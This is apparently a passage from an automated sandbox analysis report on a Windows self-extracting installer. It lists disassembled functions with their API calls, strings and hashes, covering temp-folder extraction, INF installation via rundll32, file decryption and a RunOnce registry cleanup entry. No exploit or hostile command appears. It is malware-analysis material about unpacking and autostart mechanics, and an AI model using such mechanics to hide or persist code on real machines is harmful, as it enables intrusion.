Part of subcall function 00FC44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 00FC4554

Strings

FINISHMSG, xrefs: 00FC4173, 00FC41AB
<None>, xrefs: 00FC41C5

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: 1924a185d3cb86b954aa301d092f9cbf8a5e6ff2f99d7e661b5535173fb732e6
Instruction ID: ceee6bfeccbae5e42b795dca0ae60ce2676a035bf722548e6cdd0b252ed3b452
Opcode Fuzzy Hash: 1924a185d3cb86b954aa301d092f9cbf8a5e6ff2f99d7e661b5535173fb732e6
Instruction Fuzzy Hash: 180121B270021A3BF32A16254EA7F7B718EEBC17E8F14002DBB02E21819E68EC113175

Uniqueness

Uniqueness Score: -1.00%

Function 00FC19E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,?), ref: 00FC1A18
GetDesktopWindow.USER32 ref: 00FC1A24
LoadStringA.USER32(?,?,00000200), ref: 00FC1A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00FC1A62
MessageBeep.USER32(000000FF), ref: 00FC1A6A

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: c30704d9e9f099726c9a2034cbf4348144f4470a81a853f84860d5637dc41657
Instruction ID: 025a3e1360200963b9b894a26ed94e354ceb8d318d3df910413fa68cef7506a6
Opcode Fuzzy Hash: c30704d9e9f099726c9a2034cbf4348144f4470a81a853f84860d5637dc41657
Instruction Fuzzy Hash: 5011703190110EAFDB10EF649F0AFAA77B8FB49314F108158E51693191DA34AE15FB95

Uniqueness

Uniqueness Score: -1.00%

Function 00FC63C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00FC642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00FC645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00FC647A

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00FC63EB

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 1065093856-305352358
Opcode ID: 551fe420b1c6694afa9d335d22cc393fd547fdfad10eb9dac67d313562f731b3
Instruction ID: 512791d231159d686da83d22f6fd457f78a768cf0309808f131bfc20942e37fe
Opcode Fuzzy Hash: 551fe420b1c6694afa9d335d22cc393fd547fdfad10eb9dac67d313562f731b3
Instruction Fuzzy Hash: CC210571A0421DABD710DF25DD8BFEB7368EB49314F0001A9F584E3180CAB46D849F60

Uniqueness

Uniqueness Score: -1.00%

Function 00FC47E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00FC4E6F), ref: 00FC47EA
LocalAlloc.KERNEL32(00000040,?), ref: 00FC4823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00FC4847

Part of subcall function 00FC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
Part of subcall function 00FC44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 00FC4554

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00FC4851

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 359063898-305352358
Opcode ID: bfafc4c8349678f62b262e2bb6bfe272810326bcc6487b0c7e9514bfc5076985
Instruction ID: 6291deab20746b2dd671138e7830af6df0f128c39e975a802c3cfc27b1d739c0
Opcode Fuzzy Hash: bfafc4c8349678f62b262e2bb6bfe272810326bcc6487b0c7e9514bfc5076985
Instruction Fuzzy Hash: 82115975A04606AFE7148F249E2BF733B5AEB81350F08841CFD8287381DA35AC06A720

Uniqueness

Uniqueness Score: -1.00%

Function 00FC3680 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00FC369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00FC36B2
DispatchMessageA.USER32(?), ref: 00FC36CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00FC36DA

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 647c3f14521dce53b7357bdc978a0aa6d082e70e26b2233ec6f75a320f1b300f
Instruction ID: fb153c358742db4f7d7d0ba776cbd95c137ad784552982ca7640762a9f123b67
Opcode Fuzzy Hash: 647c3f14521dce53b7357bdc978a0aa6d082e70e26b2233ec6f75a320f1b300f
Instruction Fuzzy Hash: F5018472D0021977DB304AA65D4EFEB777CEB85B64F14412DB905E2284D6609640FAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6517 Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00FC0000,000007D6,00000005), ref: 00FC652A
LoadResource.KERNEL32(00FC0000,00000000,?,?,00FC2EE8,00000000,00FC19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00FC6538
DialogBoxIndirectParamA.USER32(00FC0000,00000000,00000547,00FC19E0,00000000), ref: 00FC6557
FreeResource.KERNEL32(00000000,?,?,00FC2EE8,00000000,00FC19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00FC6560

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: 21a209582742ff070d7a1d40abe229808d0a98c9981e673e3423e7ded926ddb0
Instruction ID: 5ec0bbbd16f1a177a5759267135541520c498975402106678a386c0c838adaea
Opcode Fuzzy Hash: 21a209582742ff070d7a1d40abe229808d0a98c9981e673e3423e7ded926ddb0
Instruction Fuzzy Hash: 7001267290460EBBCB105F699D0AEBB7A6CEB85374F18052DFE00D3150D772DC10EAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FC65E8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00FC2B33), ref: 00FC6602
CharPrevA.USER32(?,00000000), ref: 00FC6612
CharPrevA.USER32(?,00000000), ref: 00FC6629
CharNextA.USER32(00000000), ref: 00FC6635

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 17e57319e6ea3b43351fc36e0a9bbd6e451f1b4cf93e3420c3119ade8ba23f49
Instruction ID: 7b3d58af2ad32567debdf926ae52f760051c536a7b6e38e4299fd5d5bab77a01
Opcode Fuzzy Hash: 17e57319e6ea3b43351fc36e0a9bbd6e451f1b4cf93e3420c3119ade8ba23f49
Instruction Fuzzy Hash: 3DF02D328081556ED7321B298E8DEB7BF9CCF87378B2D017FE491C7001D6150D06BA61

Uniqueness

Uniqueness Score: -1.00%

Function 00FC69B0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 00FC6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00FC6FC5

__set_app_type.MSVCRT ref: 00FC69C2
__p__fmode.MSVCRT ref: 00FC69D8
__p__commode.MSVCRT ref: 00FC69E6
__setusermatherr.MSVCRT ref: 00FC6A07

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: b9743a51ba79bf54a71a2c3b621868c1288cb06ece65ce41fde8bf35b905a72c
Instruction ID: 8807944f09a148ebfa291b54440b120d26be0e217a1c994add5ffb63f24dfec6
Opcode Fuzzy Hash: b9743a51ba79bf54a71a2c3b621868c1288cb06ece65ce41fde8bf35b905a72c
Instruction Fuzzy Hash: 74F0DF7054931A8FC718AB30AF0BF483BA1AB04375B140A0DE462872E0CF7AA542BA11

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: TE0FN83.exePID: 6796, Parent PID: 6708COMMON

Execution Graph

Execution Coverage:	27.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	970
Total number of Limit Nodes:	46

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004C3BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004C3C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 004C3CDC

Part of subcall function 004C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004C46A0
Part of subcall function 004C468F: SizeofResource.KERNEL32(00000000,00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46A9
Part of subcall function 004C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004C46C3
Part of subcall function 004C468F: LoadResource.KERNEL32(00000000,00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46CC
Part of subcall function 004C468F: LockResource.KERNEL32(00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46D3
Part of subcall function 004C468F: memcpy_s.MSVCRT ref: 004C46E5
Part of subcall function 004C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,004C8C42), ref: 004C3D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 004C3E26
FreeLibrary.KERNEL32(00000000,?,004C8C42), ref: 004C3EFF
LocalFree.KERNEL32(?,?,?,?,004C8C42), ref: 004C3F1F
FreeLibrary.KERNEL32(00000000,?,004C8C42), ref: 004C3F40
LocalFree.KERNEL32(?,?,?,?,004C8C42), ref: 004C3F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,004C8C42), ref: 004C3F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,004C8C42), ref: 004C3F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,004C8C42), ref: 004C3FC2

Strings

RUNPROGRAM, xrefs: 004C3D05
USRQCMD, xrefs: 004C3CAD
DoInfInstall, xrefs: 004C3E1F, 004C3E24, 004C3F68
<None>, xrefs: 004C3CC9, 004C3D7D
smo, xrefs: 004C3E68
ADMQCMD, xrefs: 004C3C9E
SHOWWINDOW, xrefs: 004C3C34
POSTRUNPROGRAM, xrefs: 004C3D60
REBOOT, xrefs: 004C3BE2
advpack.dll, xrefs: 004C3F9D
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 004C3E74
D, xrefs: 004C3C19

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$smo
API String ID: 1032054927-3762544297
Opcode ID: bdd6331b268d1239cd3848601c42938c128cca8948092851197b0d006bca2ca0
Instruction ID: d0ef386d8c6a95c15e523cf7becf375498d7422eb9e47b4d737da1c8e6606fab
Opcode Fuzzy Hash: bdd6331b268d1239cd3848601c42938c128cca8948092851197b0d006bca2ca0
Instruction Fuzzy Hash: D1B1F0786043019BE3E0DF258845F6B76E4AB85755F10892FFA86D22A1DB78CD00CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 004C1AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 004C1BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 004C1BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 004C1C57
GetPrivateProfileIntA.KERNEL32(?,Reboot,00000000,?), ref: 004C1C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,004C1140,00000000,00000008,?), ref: 004C1CB8
GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004C1D1B

Part of subcall function 004C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004C4518
Part of subcall function 004C44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 004C4554

Strings

Command.com /c %s, xrefs: 004C1D9B, 004C1DE8
.INF, xrefs: 004C1BDB
setupx.dll, xrefs: 004C1D14
Reboot, xrefs: 004C1C82
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 004C1D3B
Version, xrefs: 004C1CB3
.BAT, xrefs: 004C1D83
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 004C1BA0
", xrefs: 004C1B25
AdvancedINF, xrefs: 004C1CAE
DefaultInstall, xrefs: 004C1C74, 004C1C87, 004C1CCE, 004C1CD3, 004C1D2D, 004C1D39
setupapi.dll, xrefs: 004C1D23, 004C1D3A

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-819679500
Opcode ID: 3ee3e7c72541528b54b9761aeb12c5c1fe86d0729493134e2ac9ee7666e0fcb7
Instruction ID: dfe00df832815c4f56efd60fcf8f14a9c4cb800d1b781cc2979daae99581fe0a
Opcode Fuzzy Hash: 3ee3e7c72541528b54b9761aeb12c5c1fe86d0729493134e2ac9ee7666e0fcb7
Instruction Fuzzy Hash: 79A14B78A002186BEBA09B24CC44FE637659B47314F1442AFE456A32E2DF7C9D858B5C

Uniqueness

Uniqueness Score: -1.00%

Function 004C2F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000105), ref: 004C2F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 004C2FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 004C2FC6
DecryptFileA.ADVAPI32 ref: 004C2FE6
FreeLibrary.KERNEL32(00000000), ref: 004C2FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 004C301C

Part of subcall function 004C51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,004C2F4D,?,00000002,00000000), ref: 004C5201

Strings

advapi32.dll, xrefs: 004C2F99
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 004C2FDB, 004C3017
DecryptFileA, xrefs: 004C2FC0

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-3023407756
Opcode ID: 727cec11637cf51e9cf139bf6cf26e5f942246404bea7f578abf071bd44c6c89
Instruction ID: a0d4c7f69ee6faa656a08080092f43d0d7957bd61b48a693223b96b8053b84e6
Opcode Fuzzy Hash: 727cec11637cf51e9cf139bf6cf26e5f942246404bea7f578abf071bd44c6c89
Instruction Fuzzy Hash: 3541B83AA002059ADBE0AF739D49F6733A49B44759F10407FA945C2296EFBDCE80CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 004C2390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE(?,004C8A3A,004C11F4,004C8A3A,00000000,?,?), ref: 004C23F6
lstrcmpA.KERNEL32(?,004C11F8), ref: 004C2427
lstrcmpA.KERNEL32(?,004C11FC), ref: 004C243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 004C2495
DeleteFileA.KERNEL32(?), ref: 004C24A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 004C24AF
FindClose.KERNELBASE(00000000), ref: 004C24BE
RemoveDirectoryA.KERNELBASE(004C8A3A), ref: 004C24C5

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: c5dae634d67aceb80d5a5f50e0d710392e673c0df269fd51926be20301e37a18
Instruction ID: 2063449cfdd1b529df7fa84754cf9ab49baa2a581d858718d365a466c8bf73d6
Opcode Fuzzy Hash: c5dae634d67aceb80d5a5f50e0d710392e673c0df269fd51926be20301e37a18
Instruction Fuzzy Hash: D531A335604644ABC3A0DF65CD49FEB73ACABC5309F04493EB54582291EFBC9909875E

Uniqueness

Uniqueness Score: -1.00%

Function 004C2BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,004C6BB0,004C0000,00000000,00000002,0000000A), ref: 004C2C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,004C6BB0,004C0000,00000000,00000002,0000000A), ref: 004C2C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 004C2C28
CloseHandle.KERNEL32(00000000,?,?,004C6BB0,004C0000,00000000,00000002,0000000A), ref: 004C2C98

Strings

HeapSetInformation, xrefs: 004C2C22
Kernel32.dll, xrefs: 004C2C13

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 5d97034371ba09f825f4a343c1f0207ff37de8df06f35858470c4deb137e515a
Instruction ID: 66ca645eadfd4e8619b0b821d396ed3824005c7315879ea87519abb83f2c139c
Opcode Fuzzy Hash: 5d97034371ba09f825f4a343c1f0207ff37de8df06f35858470c4deb137e515a
Instruction Fuzzy Hash: 5911C67920020A6BD7D06B76AE49F6F37599B44398B04003FF905E7351DEF9DC41866D

Uniqueness

Uniqueness Score: -1.00%

Function 004C202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004C2050
memset.MSVCRT ref: 004C205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 004C208C

Part of subcall function 004C171E: _vsnprintf.MSVCRT ref: 004C1750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004C20C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004C20EA
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004C2103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004C2122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 004C2134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004C2144
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004C215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004C218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004C21C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004C21E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 004C223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004C2249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004C2250

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 004C2082
%s /D:%s, xrefs: 004C21FF, 004C2210
wextract_cleanup1, xrefs: 004C20A5, 004C20BE, 004C20F0, 004C2232
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 004C21F6
wextract_cleanup%d, xrefs: 004C209E
